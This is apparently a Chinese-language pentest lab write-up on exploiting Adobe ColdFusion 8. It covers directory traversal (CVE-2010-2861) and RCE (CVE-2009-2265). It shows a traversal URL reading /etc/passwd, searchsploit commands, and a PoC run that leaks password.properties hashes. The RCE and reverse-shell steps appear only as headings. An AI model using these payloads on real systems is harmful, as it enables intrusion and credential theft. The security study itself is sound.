ColdFusion
商用的快速應用程式開發平台,在1995年由JJ Allaire開創。ColdFusion最初是為了建立能與資料庫連接的網站而開發的。2.0版本(1996年推出)以後,它成為了一個全面的開發平台,包括一個整合式開發環境以及功能全面的手稿語言。ColdFusion支援的CFML(ColdFusion Markup Language)是一種手稿語言,檔案以*.cfm為檔名,在ColdFusion專用的應用伺服器環境下執行。cfm檔案被編譯器翻譯為對應的C++語言程式,然後執行並向瀏覽器返回結果。它的設計思想被一些人認為非常先進,被一些語言所借鑑。
🔍 1. 發現點
目標系統: Adobe ColdFusion 8
已知漏洞:
目錄遍歷 (Directory Traversal) → CVE-2010-2861
遠端程式碼執行 (Remote Code Execution, RCE) → CVE-2009-2265
使用
searchsploit尋找漏洞:searchsploit adobe coldfusion發現 ColdFusion 8 RCE & 目錄遍歷漏洞
🚀 2. 測試Payload
📂 目錄遍歷 (CVE-2010-2861)
驗證漏洞
http://www.example.com/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../etc/passwd使用 Searchsploit 複製並執行 PoC
searchsploit -p 14641 cp /usr/share/exploitdb/exploits/multiple/remote/14641.py . python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"成功獲取
password.propertiestxt複製編輯rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true
💀 RCE (CVE-2009-2265)
下載並執行 RCE Exploit
修改 Exploit 參數
執行攻擊
🎯 3. 取得反向 Shell
開始監聽
成功獲取遠端 Shell
🔗 5. 連鎖漏洞
✅ ColdFusion 8 目錄遍歷 → 洩露敏感文件 (password.properties)
✅ 利用 password.properties 嘗試解密管理密碼
✅ ColdFusion 8 RCE → 上傳 Web Shell 獲取遠端存取
✅ 進一步提權或橫向移動
最后更新于
这有帮助吗?